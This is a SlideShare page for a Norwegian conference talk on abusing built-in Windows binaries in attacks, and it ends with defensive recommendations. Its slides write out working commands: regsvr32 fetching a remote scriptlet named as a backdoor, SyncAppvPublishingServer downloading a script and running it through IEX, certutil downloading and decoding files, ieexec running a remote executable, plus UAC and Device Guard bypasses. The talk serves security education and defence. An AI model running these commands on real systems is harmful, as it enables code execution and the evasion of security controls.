SlideShare a Scribd company logo

Hacke windows med windows - avanserte angrep

O
Oddvar Moe

This document summarizes a presentation about advanced Windows attacks. It introduces the speaker and their background in IT and security. It then discusses traditional phishing attacks to gain initial access and shows examples of using legitimate Windows tools like REGSVR32.exe, RUNDLL32.exe, SYNCAPPVPUBLISHINGSERVER.exe, CERTUTIL.exe, and others to execute code and bypass defenses. Specific attacks demonstrated include using these tools to launch calculators, run PowerShell commands, and more. The presentation recommends defenses like application whitelisting, Device Guard, and AppLocker but notes bypass techniques. It emphasizes that while attacks can use basic methods, organizations still need robust security controls and detection.

Technology
1 of 28
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
Hacke Windows med Windows – Avanserte angrep MTUG 10.09.2017
WHOAMI • Geek/Pentester/Security researcher/IT-Pro/MVP/Speaker • Jobbet med IT siden 2000 • Første MCP når jeg var 16 • Work @ Advania – Chief Technical Architect • Gift/barn/hund • Blog: http://oddvar.moe • Twitter: @oddvarmoe
Angrep – Hvordan skaffe seg første tilgang • Tradisjonelt angrep • Sende mail • Link • Vedlegg • Phishing side • Ekstern server • OWA • ADFS • Skype • 3.parts
Hacke windows med windows - avanserte angrep
Hacke windows med windows - avanserte angrep
Trenger du flere eksempler? • https://onedrive.live.com/?authkey=%21ADev0bfQMNxv504&cid=C9 6A3EEDCE316E4C&id=C96A3EEDCE316E4C%21114&parId=C96A3EED CE316E4C%21109&o=OneUp
Call to Action!
Call to Action! • Innstilling i Office (2013/2016)
Hva er bak enable content? • Her kommer det interessante • Hva gjør de? • Vi skal se på en del eksempler • Real attacks • «Future attacks»
Hva mener du med «Hacke Windows med Windows» • Angripere har skiftet fokus • Benytter Windows funksjonalitet for å utføre angrep • Misbruker godkjente verktøy • Ikke lengere malware.exe
REGSVR32.exe • regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll • Proxy aware
REGSVR32.exe • Kalkulator: • regsvr32 /s /n /u /i:https://gist.githubusercontent.com/api0cradle/1409e8f00ae51dd6 b736b30947a3d0c2/raw/ef22366bfb62a2ddea8c5e321d3ce2f4c95d2 a66/Backdoor-Minimalist.sct scrobj.dll
rundll32.exe • rundll32.exe javascript:"..mshtml,RunHTMLApplication ";alert('User%20Group%20Agder'); • (Blir nå tatt av Windows Defender) • Detaljert forklaring: https://stackoverflow.com/questions/25131484/rundll32-exe- javascript
Rundll32.exe • Kalkulator: • rundll32.exe javascript:"..mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject("WScript.Shell");w.run("calc");w indow.close()");
SyncAppvPublishingServer.exe • SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX • Kommando injection feil
SyncAppvPublishingServer.exe • Kalkulator: • SyncAppvPublishingServer.exe "n;(calc) • cmd.exe /c cscript.exe SyncAppVPublishingServer.vbs ".; Start-Process rundll32.exe 'shell32.dll,ShellExec_RunDLL calc.exe'" • Bevis på Powershell: • SyncAppvPublishingServer.exe "n;(get-service | out-gridview)
Certutil.exe • certutil.exe -urlcache -split -f http://www.7-zip.org/a/7z1701.exe 7zip.exe • certutil.exe /decode base64kodetfil.txt x64.dll • certutil -Class scrobj.dll
Noen andre uten demo • msbuild.exe pshell.xml • regsvcs.exe /U regsvcs.dll regsvcs.exe regsvcs.dll • regasm.exe /U regsvcs.dll regasm.exe regsvcs.dll • InstallUtil.exe /logfile= /LogToConsole=false /U MYDLL.dll • msxsl.exe customers.xml script.xsl
Min research • BGINFO.exe bginfo.exe 10.10.10.10webdavbginfo.bgi /popup /nolicprompt Video: https://youtu.be/OiKhgSxWKUM • CMSTP.exe UAC Bypass og DLL Loading https://msitpros.com/wp- content/uploads/2017/08/WebDavDLLLoadBlog.gif
Min research • CVE-2017-8625 • hh.exe /? (Hva gjør denne tror du?) • Device Guard bypass • https://msitpros.com/wp-content/uploads/2017/08/CVE-2017- 8625.gif
Kode i kode
EXE filer som kan starte andre EXE filer • Eksempler: • scriptrunner.exe -appvscript calc.exe • forfiles /p c:windowssystem32 /m notepad.exe /c calc.exe • ieexec.exe http://x.x.x.x:8080/bypass.exe (.NET exe) • bash.exe -c calc.exe (Linux i Windows)
Proxy • netsh interface portproxy add v4tov4 listenport=9999 listenaddress=0.0.0.0 connectport=445 connectaddress=192.168.1.112
Hacke windows med windows - avanserte angrep
Hva burde du gjøre? • Application whitelisting • Device Guard • AppLocker • Husk AppLocker bypass listen min: • https://github.com/api0cradle/UltimateAppLockerByPassList • Implementer deteksjon (Splunk / WDATP / ATA)
SELV OM DU KAN RANE EN BANK MED PENN OG PAPIR, BETYR DET IKKE AT DU IKKE SKAL HA ET HVELV!
SHAMELESS PLUG!
Takk for meg!

More Related Content

PPTX
NIC 2017 - Attack and detection in Windows Environments
Oddvar Moe
 
PDF
Tale of Forgotten Disclosure and Lesson learned
Anant Shrivastava
 
PPTX
Bug bounty
n|u - The Open Security Community
 
PPTX
Basics of getting Into Bug Bounty Hunting
Muhammad Khizer Javed
 
PDF
10 things I’ve learnt about web application security
James Crowley
 
PDF
How To Build The Perfect Backtrack 4 Usb Drive
kriggins
 
PPTX
Word press security
Jigar Pandya
 
PDF
Owasp Mobile Risk M2 : Insecure Data Storage : null/OWASP/G4H Bangalore Aug 2014
Anant Shrivastava
 
NIC 2017 - Attack and detection in Windows Environments
Oddvar Moe
 
Tale of Forgotten Disclosure and Lesson learned
Anant Shrivastava
 
Bug bounty
n|u - The Open Security Community
 
Basics of getting Into Bug Bounty Hunting
Muhammad Khizer Javed
 
10 things I’ve learnt about web application security
James Crowley
 
How To Build The Perfect Backtrack 4 Usb Drive
kriggins
 
Word press security
Jigar Pandya
 
Owasp Mobile Risk M2 : Insecure Data Storage : null/OWASP/G4H Bangalore Aug 2014
Anant Shrivastava
 

What's hot (20)

PDF
Attacking Drupal
Greg Foss
 
PPTX
SOC training
Kirill Ermakov
 
PPTX
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Mazin Ahmed
 
PPTX
XSS (Cross Site Scripting)
Shubham Gupta
 
PDF
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
Chris Gates
 
PDF
Is rust language really safe?
Nullbyte Security Conference
 
PDF
CMS Hacking Tricks - DerbyCon 4 - 2014
Greg Foss
 
PDF
Web Security: What's wrong, and how the bad guys can break your website
Andrew Sorensen
 
PDF
MR201504 Web Defacing Attacks Targeting WordPress
FFRI, Inc.
 
PPTX
ECrime presentation - A few bits about malware
Michael Hendrickx
 
PPTX
Devouring Security XML Attack surface and Defences
gmaran23
 
PDF
WordPress Security 101 – WordCamp Finland 2016 presentation by Otto Kekäläine...
Otto Kekäläinen
 
PDF
Powershell'in Karanlık Yüzü
Halil Dalabasmaz
 
PDF
Keep Your SIte Secure
Michele Butcher-Jones
 
PDF
Hacking Web Apps by Brent White
EC-Council
 
PPTX
Don't get stung - an introduction to the OWASP Top 10
Barry Dorrans
 
PDF
Ekoparty 2017 - The Bug Hunter's Methodology
bugcrowd
 
PPTX
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
Quek Lilian
 
PPTX
Bug Bounty #Defconlucknow2016
Shubham Gupta
 
PPTX
Bug Bounty for - Beginners
Himanshu Kumar Das
 
Attacking Drupal
Greg Foss
 
SOC training
Kirill Ermakov
 
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Mazin Ahmed
 
XSS (Cross Site Scripting)
Shubham Gupta
 
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
Chris Gates
 
Is rust language really safe?
Nullbyte Security Conference
 
CMS Hacking Tricks - DerbyCon 4 - 2014
Greg Foss
 
Web Security: What's wrong, and how the bad guys can break your website
Andrew Sorensen
 
MR201504 Web Defacing Attacks Targeting WordPress
FFRI, Inc.
 
ECrime presentation - A few bits about malware
Michael Hendrickx
 
Devouring Security XML Attack surface and Defences
gmaran23
 
WordPress Security 101 – WordCamp Finland 2016 presentation by Otto Kekäläine...
Otto Kekäläinen
 
Powershell'in Karanlık Yüzü
Halil Dalabasmaz
 
Keep Your SIte Secure
Michele Butcher-Jones
 
Hacking Web Apps by Brent White
EC-Council
 
Don't get stung - an introduction to the OWASP Top 10
Barry Dorrans
 
Ekoparty 2017 - The Bug Hunter's Methodology
bugcrowd
 
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
Quek Lilian
 
Bug Bounty #Defconlucknow2016
Shubham Gupta
 
Bug Bounty for - Beginners
Himanshu Kumar Das
 

Similar to Hacke windows med windows - avanserte angrep (20)

PDF
Endpoint is not enough
Sumedt Jitpukdebodin
 
PDF
Owasp tds
snyff
 
PPTX
Tech IT Easy x DevTalk : "Secure Your Coding with OWASP"
Andi Rustandi Djunaedi
 
PDF
Deeplook into apt and how to detect and defend v1.0
Michael Gough
 
PPTX
Offensive Python for Pentesting
Mike Felch
 
PDF
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
bugcrowd
 
PPTX
Bsidesnova- Pentesting Methodology - Making bits less complicated
Octavio Paguaga
 
PDF
Ci for i-os-codemash-01.2013
Kevin Munc
 
PPTX
Bsides tampa
Octavio Paguaga
 
PPTX
How to discover 1352 Wordpress plugin 0days in one hour (not really)
Larry Cashdollar
 
PDF
Debugging, Monitoring and Profiling in TYPO3
AOE
 
PDF
Ask a Malware Archaeologist
Michael Gough
 
PPTX
Alexey Sintsov- SDLC - try me to implement
DefconRussia
 
PPTX
Ethical hacking 101 - Singapore RSA 2019
Paul Haskell-Dowland
 
PPTX
OWASP Top 10 - Day 1 - A1 injection attacks
Mohamed Talaat
 
PPTX
Blue Teaming on a Budget of Zero
Kyle Bubp
 
PPTX
Software Engineering in Startups
Dusan Omercevic
 
PDF
Testing mit Codeception: Full-stack testing PHP framework
SusannSgorzaly
 
PDF
BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1
Michael Gough
 
PDF
openQA hands on with openSUSE Leap 42.1 - openSUSE.Asia Summit ID 2016
Ben Chou
 
Endpoint is not enough
Sumedt Jitpukdebodin
 
Owasp tds
snyff
 
Tech IT Easy x DevTalk : "Secure Your Coding with OWASP"
Andi Rustandi Djunaedi
 
Deeplook into apt and how to detect and defend v1.0
Michael Gough
 
Offensive Python for Pentesting
Mike Felch
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
bugcrowd
 
Bsidesnova- Pentesting Methodology - Making bits less complicated
Octavio Paguaga
 
Ci for i-os-codemash-01.2013
Kevin Munc
 
Bsides tampa
Octavio Paguaga
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
Larry Cashdollar
 
Debugging, Monitoring and Profiling in TYPO3
AOE
 
Ask a Malware Archaeologist
Michael Gough
 
Alexey Sintsov- SDLC - try me to implement
DefconRussia
 
Ethical hacking 101 - Singapore RSA 2019
Paul Haskell-Dowland
 
OWASP Top 10 - Day 1 - A1 injection attacks
Mohamed Talaat
 
Blue Teaming on a Budget of Zero
Kyle Bubp
 
Software Engineering in Startups
Dusan Omercevic
 
Testing mit Codeception: Full-stack testing PHP framework
SusannSgorzaly
 
BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1
Michael Gough
 
openQA hands on with openSUSE Leap 42.1 - openSUSE.Asia Summit ID 2016
Ben Chou
 

More from Oddvar Moe (9)

PPTX
Windows Client Privilege Escalation-Shared.pptx
Oddvar Moe
 
PPTX
Hva avanserte hackere gjør for å få tilgang - Publisert.pptx
Oddvar Moe
 
PPTX
Red teaming and war stories
Oddvar Moe
 
PPTX
Enkel og effektiv herding av windows
Oddvar Moe
 
PPTX
Phishing past mail protection controls using azure information
Oddvar Moe
 
PPTX
App-o-Lockalypse now!
Oddvar Moe
 
PPTX
#Lolbins - Nothing to LOL about!
Oddvar Moe
 
PPTX
Windows binærfiler
Oddvar Moe
 
PPTX
Angrep og deteksjon user group 22.september
Oddvar Moe
 
Windows Client Privilege Escalation-Shared.pptx
Oddvar Moe
 
Hva avanserte hackere gjør for å få tilgang - Publisert.pptx
Oddvar Moe
 
Red teaming and war stories
Oddvar Moe
 
Enkel og effektiv herding av windows
Oddvar Moe
 
Phishing past mail protection controls using azure information
Oddvar Moe
 
App-o-Lockalypse now!
Oddvar Moe
 
#Lolbins - Nothing to LOL about!
Oddvar Moe
 
Windows binærfiler
Oddvar Moe
 
Angrep og deteksjon user group 22.september
Oddvar Moe
 

Recently uploaded (20)

PDF
Accelerating Oracle Database 23ai Troubleshooting with Oracle AHF Fleet Insig...
Sandesh Rao
 
PDF
Structs to JSON: How Go Powers REST APIs
Emily Achieng
 
PDF
NewMind AI Weekly Chronicles - July'25 - Week IV
NewMind AI
 
PPTX
AI and Robotics for Human Well-being.pptx
JAYMIN SUTHAR
 
PPTX
Agile Chennai 18-19 July 2025 | Emerging patterns in Agentic AI by Bharani Su...
AgileNetwork
 
PPTX
Applied-Statistics-Mastering-Data-Driven-Decisions.pptx
parmaryashparmaryash
 
PDF
The Future of Artificial Intelligence (AI)
Mukul
 
PDF
Unlocking the Future- AI Agents Meet Oracle Database 23ai - AIOUG Yatra 2025.pdf
Sandesh Rao
 
PDF
Google I/O Extended 2025 Baku - all ppts
HusseinMalikMammadli
 
PPTX
Agile Chennai 18-19 July 2025 Ideathon | AI Powered Microfinance Literacy Gui...
AgileNetwork
 
PDF
CIFDAQ's Market Wrap : Bears Back in Control?
CIFDAQ
 
PDF
Economic Impact of Data Centres to the Malaysian Economy
flintglobalapac
 
PDF
A Strategic Analysis of the MVNO Wave in Emerging Markets.pdf
IPLOOK Networks
 
PDF
The Future of Mobile Is Context-Aware—Are You Ready?
iProgrammer Solutions Private Limited
 
PDF
Oracle AI Vector Search- Getting Started and what's new in 2025- AIOUG Yatra ...
Sandesh Rao
 
PDF
OFFOFFBOX™ – A New Era for African Film | Startup Presentation
ambaicciwalkerbrian
 
PDF
Peak of Data & AI Encore - Real-Time Insights & Scalable Editing with ArcGIS
Safe Software
 
PDF
Doc9.....................................
SofiaCollazos
 
PDF
Automating ArcGIS Content Discovery with FME: A Real World Use Case
Safe Software
 
PDF
Make GenAI investments go further with the Dell AI Factory
Principled Technologies
 
Accelerating Oracle Database 23ai Troubleshooting with Oracle AHF Fleet Insig...
Sandesh Rao
 
Structs to JSON: How Go Powers REST APIs
Emily Achieng
 
NewMind AI Weekly Chronicles - July'25 - Week IV
NewMind AI
 
AI and Robotics for Human Well-being.pptx
JAYMIN SUTHAR
 
Agile Chennai 18-19 July 2025 | Emerging patterns in Agentic AI by Bharani Su...
AgileNetwork
 
Applied-Statistics-Mastering-Data-Driven-Decisions.pptx
parmaryashparmaryash
 
The Future of Artificial Intelligence (AI)
Mukul
 
Unlocking the Future- AI Agents Meet Oracle Database 23ai - AIOUG Yatra 2025.pdf
Sandesh Rao
 
Google I/O Extended 2025 Baku - all ppts
HusseinMalikMammadli
 
Agile Chennai 18-19 July 2025 Ideathon | AI Powered Microfinance Literacy Gui...
AgileNetwork
 
CIFDAQ's Market Wrap : Bears Back in Control?
CIFDAQ
 
Economic Impact of Data Centres to the Malaysian Economy
flintglobalapac
 
A Strategic Analysis of the MVNO Wave in Emerging Markets.pdf
IPLOOK Networks
 
The Future of Mobile Is Context-Aware—Are You Ready?
iProgrammer Solutions Private Limited
 
Oracle AI Vector Search- Getting Started and what's new in 2025- AIOUG Yatra ...
Sandesh Rao
 
OFFOFFBOX™ – A New Era for African Film | Startup Presentation
ambaicciwalkerbrian
 
Peak of Data & AI Encore - Real-Time Insights & Scalable Editing with ArcGIS
Safe Software
 
Doc9.....................................
SofiaCollazos
 
Automating ArcGIS Content Discovery with FME: A Real World Use Case
Safe Software
 
Make GenAI investments go further with the Dell AI Factory
Principled Technologies
 

Hacke windows med windows - avanserte angrep

  • 1. Hacke Windows med Windows – Avanserte angrep MTUG 10.09.2017
  • 2. WHOAMI • Geek/Pentester/Security researcher/IT-Pro/MVP/Speaker • Jobbet med IT siden 2000 • Første MCP når jeg var 16 • Work @ Advania – Chief Technical Architect • Gift/barn/hund • Blog: http://oddvar.moe • Twitter: @oddvarmoe
  • 3. Angrep – Hvordan skaffe seg første tilgang • Tradisjonelt angrep • Sende mail • Link • Vedlegg • Phishing side • Ekstern server • OWA • ADFS • Skype • 3.parts
  • 6. Trenger du flere eksempler? • https://onedrive.live.com/?authkey=%21ADev0bfQMNxv504&cid=C9 6A3EEDCE316E4C&id=C96A3EEDCE316E4C%21114&parId=C96A3EED CE316E4C%21109&o=OneUp
  • 8. Call to Action! • Innstilling i Office (2013/2016)
  • 9. Hva er bak enable content? • Her kommer det interessante • Hva gjør de? • Vi skal se på en del eksempler • Real attacks • «Future attacks»
  • 10. Hva mener du med «Hacke Windows med Windows» • Angripere har skiftet fokus • Benytter Windows funksjonalitet for å utføre angrep • Misbruker godkjente verktøy • Ikke lengere malware.exe
  • 11. REGSVR32.exe • regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll • Proxy aware
  • 12. REGSVR32.exe • Kalkulator: • regsvr32 /s /n /u /i:https://gist.githubusercontent.com/api0cradle/1409e8f00ae51dd6 b736b30947a3d0c2/raw/ef22366bfb62a2ddea8c5e321d3ce2f4c95d2 a66/Backdoor-Minimalist.sct scrobj.dll
  • 13. rundll32.exe • rundll32.exe javascript:"..mshtml,RunHTMLApplication ";alert('User%20Group%20Agder'); • (Blir nå tatt av Windows Defender) • Detaljert forklaring: https://stackoverflow.com/questions/25131484/rundll32-exe- javascript
  • 14. Rundll32.exe • Kalkulator: • rundll32.exe javascript:"..mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject("WScript.Shell");w.run("calc");w indow.close()");
  • 16. SyncAppvPublishingServer.exe • Kalkulator: • SyncAppvPublishingServer.exe "n;(calc) • cmd.exe /c cscript.exe SyncAppVPublishingServer.vbs ".; Start-Process rundll32.exe 'shell32.dll,ShellExec_RunDLL calc.exe'" • Bevis på Powershell: • SyncAppvPublishingServer.exe "n;(get-service | out-gridview)
  • 17. Certutil.exe • certutil.exe -urlcache -split -f http://www.7-zip.org/a/7z1701.exe 7zip.exe • certutil.exe /decode base64kodetfil.txt x64.dll • certutil -Class scrobj.dll
  • 18. Noen andre uten demo • msbuild.exe pshell.xml • regsvcs.exe /U regsvcs.dll regsvcs.exe regsvcs.dll • regasm.exe /U regsvcs.dll regasm.exe regsvcs.dll • InstallUtil.exe /logfile= /LogToConsole=false /U MYDLL.dll • msxsl.exe customers.xml script.xsl
  • 19. Min research • BGINFO.exe bginfo.exe 10.10.10.10webdavbginfo.bgi /popup /nolicprompt Video: https://youtu.be/OiKhgSxWKUM • CMSTP.exe UAC Bypass og DLL Loading https://msitpros.com/wp- content/uploads/2017/08/WebDavDLLLoadBlog.gif
  • 20. Min research • CVE-2017-8625 • hh.exe /? (Hva gjør denne tror du?) • Device Guard bypass • https://msitpros.com/wp-content/uploads/2017/08/CVE-2017- 8625.gif
  • 22. EXE filer som kan starte andre EXE filer • Eksempler: • scriptrunner.exe -appvscript calc.exe • forfiles /p c:windowssystem32 /m notepad.exe /c calc.exe • ieexec.exe http://x.x.x.x:8080/bypass.exe (.NET exe) • bash.exe -c calc.exe (Linux i Windows)
  • 23. Proxy • netsh interface portproxy add v4tov4 listenport=9999 listenaddress=0.0.0.0 connectport=445 connectaddress=192.168.1.112
  • 25. Hva burde du gjøre? • Application whitelisting • Device Guard • AppLocker • Husk AppLocker bypass listen min: • https://github.com/api0cradle/UltimateAppLockerByPassList • Implementer deteksjon (Splunk / WDATP / ATA)
  • 26. SELV OM DU KAN RANE EN BANK MED PENN OG PAPIR, BETYR DET IKKE AT DU IKKE SKAL HA ET HVELV!

Editor's Notes

  • #12: regsvr32 /s /n /u /i:https://gist.githubusercontent.com/api0cradle/1409e8f00ae51dd6b736b30947a3d0c2/raw/ef22366bfb62a2ddea8c5e321d3ce2f4c95d2a66/Backdoor-Minimalist.sct scrobj.dll
  • #14: D